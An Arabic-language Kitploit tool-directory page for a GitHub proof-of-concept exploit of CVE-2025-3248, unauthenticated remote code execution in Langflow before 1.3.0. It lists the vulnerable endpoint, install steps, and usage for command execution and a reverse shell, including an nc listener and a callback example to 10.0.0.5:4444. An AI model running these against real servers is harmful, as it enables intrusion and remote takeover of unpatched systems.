Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
langflow-exploit — PoC لـ CVE-2025-3248: تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Langflow < 1.3.0 عبر /api/v1/validate/code. | Kitploit
أدوات/GitHubGitHub/preemware/langflow-exploit
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubpreemware/langflow-exploit

langflow-exploit

PoC لـ CVE-2025-3248: تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة في Langflow < 1.3.0 عبر /api/v1/validate/code.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3248 - ثغرة RCE في نقطة التحقق من الكود في Langflow

استغلال لإثبات المفهوم يوضح ثغرة تنفيذ تعليمات برمجية عن بُعد في نقطة التحقق من الكود في Langflow. تؤثر هذه الثغرة على إصدارات Langflow الأقدم من 1.3.0، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية عبر طلبات HTTP معدّة بعناية.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-3248
  • الإصدارات المتأثرة: < 1.3.0
  • متجه الهجوم: عن بُعد
  • المصادقة المطلوبة: لا
  • التأثير: تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • نقطة النهاية: /api/v1/validate/code

المتطلبات الأساسية

  • Python 3.x
  • حزم Python المطلوبة:
    • requests
    • colorama

التثبيت

  1. استنساخ المستودع:
root@kitploit:~
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
  1. تثبيت التبعيات:
root@kitploit:~
pip install requests colorama

الاستخدام

يدعم الاستغلال وضعين للتشغيل:

1. وضع تنفيذ الأوامر

تنفيذ أمر واحد على النظام المستهدف:

root@kitploit:~
python3 cve-2025-3248.py cmd <target_url> "<command>"

مثال:

root@kitploit:~
python3 cve-2025-3248.py cmd http://target:7860 "id"

2. وضع الصدفة العكسية

تشغيل صدفة عكسية تفاعلية:

  1. أولاً، شغّل مستمعًا على جهازك:
root@kitploit:~
nc -lvnp 4444
  1. ثم شغّل الاستغلال:
root@kitploit:~
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>

مثال:

root@kitploit:~
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
تنزيل الأداة